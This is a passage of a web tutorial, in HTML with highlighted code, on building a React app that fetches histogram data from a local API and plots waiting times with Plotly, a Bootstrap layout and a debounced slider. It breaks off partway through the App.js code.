&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npx create-react-app example-app
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd example-app
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm start
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;npx is a tool bundled with npm that lets us run a package without installing it into our project, so we can run the create-react-app package without keeping it as a node module.&lt;/p&gt;
&lt;p&gt;This generates a React application directory within the directory we are in, with the name that we give to the create-react-app command; in this case it is example-app, but you may call it whatever you wish.
We can then change directory into the created example-app directory and use npm start to start a development server hosting the example app.&lt;/p&gt;
&lt;p&gt;The development server reloads the app while it is running whenever it detects changes to the source code in the src subdirectory.
We can now view the example app if we navigate to &lt;code&gt;localhost:3000&lt;/code&gt; in a web browser.&lt;/p&gt;
&lt;img class="image-center" src="react_base_page.png" alt="Screenshot of react logo with text: Edit src/App.js and save to reload. Learn React." style="width:650px; class:image-center"&gt;
&lt;p&gt;We can stop the development server for now using Ctrl+C in the terminal hosting the app.&lt;/p&gt;
&lt;h3 id="npm-dependencies"&gt;npm dependencies&lt;/h3&gt;
&lt;p&gt;We now need to install some npm dependencies using npm from within our example-app directory&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm install react-bootstrap bootstrap react-plotly.js plotly.js rc-slider axios lodash
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will install packages containing some open source React components that we will use in our application&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://react-bootstrap.github.io/" rel="external"&gt;react-bootstrap&lt;/a&gt; - a React package for Bootstrap&lt;/li&gt;
&lt;li&gt;&lt;a href="https://getbootstrap.com/" rel="external"&gt;bootstrap&lt;/a&gt; - a styling library for quickly designing UIs&lt;/li&gt;
&lt;li&gt;&lt;a href="https://plotly.com/javascript/react/" rel="external"&gt;react-plotly.js&lt;/a&gt; - a React wrapper for plotly.js&lt;/li&gt;
&lt;li&gt;&lt;a href="https://plotly.com/javascript/react/" rel="external"&gt;plotly.js&lt;/a&gt; - a graphing library and a dependency of react-plotly.js, which we will use to plot our histogram data&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.npmjs.com/package/rc-slider" rel="external"&gt;rc-slider&lt;/a&gt; - a React slider component which we will use to select the number of bins&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/axios/axios" rel="external"&gt;axios&lt;/a&gt; - a Promise based HTTP client which we will use to make requests to our API&lt;/li&gt;
&lt;li&gt;&lt;a href="https://lodash.com/" rel="external"&gt;lodash&lt;/a&gt; - a utility library which we will use to &lt;a href="https://css-tricks.com/debouncing-throttling-explained-examples/" rel="external"&gt;debounce&lt;/a&gt; requests from rc-slider&lt;/li&gt;
&lt;/ul&gt;
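&lt;p&gt;To illustrate what debouncing means here, below is a minimal sketch of a trailing-edge debounce written from scratch. It is not the lodash implementation, and the handler and the 60 ms delay are placeholders; the point is only that a burst of calls collapses into a single call with the latest value.&lt;/p&gt;

```javascript
// Minimal trailing-edge debounce: only the last call in a burst runs,
// once `wait` milliseconds have passed without another call.
function debounce(fn, wait) {
  let timer = null;
  return function debounced(...args) {
    clearTimeout(timer); // cancel the pending call, if any
    timer = setTimeout(() => fn.apply(this, args), wait);
  };
}

// Hypothetical handler standing in for a request to the API.
const requested = [];
const onSliderChange = debounce((bins) => requested.push(bins), 60);

// Simulate a user dragging the slider quickly through three values.
onSliderChange(10);
onSliderChange(11);
onSliderChange(12);
// Once the 60 ms delay has elapsed, `requested` holds only the final value, 12.
```

&lt;p&gt;Without the debounce, each of the three slider values would trigger its own request; with it, only the value the user settles on is sent.&lt;/p&gt;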
&lt;h3 id="jsx"&gt;JSX&lt;/h3&gt;
&lt;p&gt;The JavaScript files in the following sections contain JSX, a syntax extension for JavaScript that you may not be familiar with if you have only used plain JavaScript. JSX is converted into plain JavaScript when compiled; the two snippets below are identical in functionality.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; element &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;h1&lt;/span&gt; className&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Hello, world&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;h1&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; element &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; React.createElement(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;h1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {className&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;greeting&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Hello, world!&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;React doesn’t require using JSX, but most people find it helpful as a visual aid when working with user interfaces as it is structurally very similar to HTML.&lt;/p&gt;
&lt;p&gt;Further JSX information can be found &lt;a href="https://reactjs.org/docs/introducing-jsx.html" rel="external"&gt;here&lt;/a&gt;&lt;/p&gt;
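&lt;p&gt;To make the equivalence more concrete, the sketch below uses a hypothetical stand-in for React.createElement that simply records its arguments. It is not how React is implemented, but it shows that the compiled form of JSX is an ordinary function call returning a plain object that describes the element.&lt;/p&gt;

```javascript
// Hypothetical stand-in for React.createElement, for illustration only.
// It is NOT the React implementation; it just records its arguments.
function createElement(type, props, ...children) {
  return { type, props: { ...props, children } };
}

// The compiled form of the h1 greeting element from the snippets above.
const element = createElement("h1", { className: "greeting" }, "Hello, world!");

console.log(element.type);            // h1
console.log(element.props.className); // greeting
console.log(element.props.children);  // [ 'Hello, world!' ]
```

&lt;p&gt;Nested JSX tags compile in the same way, with inner calls passed as the children of outer ones.&lt;/p&gt;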
&lt;h3 id="indexjs"&gt;index.js&lt;/h3&gt;
&lt;p&gt;The first file that we start with in a React project is index.js. It typically handles app startup and renders the App component. With create-react-app it is the JavaScript entry point of the application.
For the purpose of this tutorial we can leave the index.js file mostly as it comes. In the render call of index.js we see HTML-like tags: the &amp;ldquo;&lt;code&gt;&amp;lt;App /&amp;gt;&lt;/code&gt;&amp;rdquo; tag renders our App component, which is exported from App.js.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; React from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ReactDOM from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react-dom&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;./index.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; App from &lt;span style="color:#a5d6ff"&gt;&amp;#39;./App&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; reportWebVitals from &lt;span style="color:#a5d6ff"&gt;&amp;#39;./reportWebVitals&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ReactDOM.render(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;React.StrictMode&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;App&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;React.StrictMode&lt;/span&gt;&amp;gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; document.getElementById(&lt;span style="color:#a5d6ff"&gt;&amp;#39;root&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// If you want to start measuring performance in your app, pass a function
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// to log results (for example: reportWebVitals(console.log))
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// or send to an analytics endpoint. Learn more: https://bit.ly/CRA-vitals
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;reportWebVitals();
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="appjs-component-full-code"&gt;App.js Component Full Code&lt;/h3&gt;
&lt;p&gt;For this tutorial we only really need to edit the App.js file to change the App component that index.js uses.
In the src folder, we want to remove all the current code in App.js and replace it with the following. The code will be explained section by section afterwards.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; React from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bootstrap/dist/css/bootstrap.min.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; { Container, Col, Row, Card } from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react-bootstrap&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; axios from &lt;span style="color:#a5d6ff"&gt;&amp;#39;axios&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Slider from &lt;span style="color:#a5d6ff"&gt;&amp;#39;rc-slider&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;rc-slider/assets/index.css&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Plot from &lt;span style="color:#a5d6ff"&gt;&amp;#39;react-plotly.js&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; { debounce } from &lt;span style="color:#a5d6ff"&gt;&amp;#39;lodash&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;class&lt;/span&gt; App &lt;span style="color:#ff7b72"&gt;extends&lt;/span&gt; React.Component {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; constructor(props) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;super&lt;/span&gt;(props)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.state &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange.bind(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; onSliderChange(input) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; axios.get(&lt;span style="color:#a5d6ff"&gt;`http://localhost:8000/hist-raw`&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; input,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }).then((data) =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.setState({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rawdata&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bar&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; render() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;div&lt;/span&gt; className&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;App&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Container&lt;/span&gt; fluid&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Row&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt; md&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;}&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Title&lt;/span&gt;&amp;gt;Hello React&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Title&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Card.Text&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;label&lt;/span&gt; htmlFor&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt; className&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;col-form-label&amp;#34;&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Number &lt;span style="color:#ff7b72"&gt;of&lt;/span&gt; bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;label&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Slider&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;bins&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; onChange&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{debounce(&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.onSliderChange, &lt;span style="color:#a5d6ff"&gt;60&lt;/span&gt;)}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; max&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; marks&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;13&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;13&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;26&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;26&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;38&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;38&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;50&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }} toolTipVisibleAlways&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;} /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Text&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card.Body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Card&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Col&lt;/span&gt; md&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;}&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;&lt;span style="color:#7ee787"&gt;Plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.state.rawdata}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; layout&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of waiting times&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bargap&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; autosize&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Waiting time to next eruption (in mins)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yaxis&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Frequency&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; useResizeHandler&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;,
